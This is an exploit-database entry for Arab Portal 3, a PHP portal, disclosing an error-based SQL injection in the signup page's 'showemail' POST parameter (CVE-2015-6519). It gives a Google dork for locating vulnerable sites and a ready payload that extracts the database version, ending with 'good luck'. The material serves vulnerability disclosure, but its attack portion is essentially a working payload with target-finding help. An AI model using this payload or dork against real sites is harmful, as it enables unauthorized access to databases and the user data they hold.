Arab Portal 3 - SQL Injection

Author: ali ahmady
type: webapps
platform: php
port: 80.0
date_added: 2015-07-13  
date_updated: 2015-07-13  
verified: 0  
codes: CVE-2015-6519;OSVDB-124457  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comArabPortal.zip  

raw file: 37594.txt  

## In The Name Of ALLAH ##
# title : Arabportal 3 SQL injection vulnerability
# Exploit Title: Arabportal 3 registeration section SQL injection vulnerability
# Google Dork: inurl:members.php?action=signup
# Date: 2015/07/10 (july 10th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: www.arabportal.net
# Software Link: www.arabportal.net
# Version: 3
# Tested on: linux
# greetings : VIRkid, b0x, phantom_x, Ch3rn0by1


members.php?action=singup

POST parameter "showemail" is vulnerable to error based SQLi attack

................................................................................

1' AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) AND 'ali-ahmady'='ali-ahmady


video : https://youtu.be/5nFblYE90Vk

good luck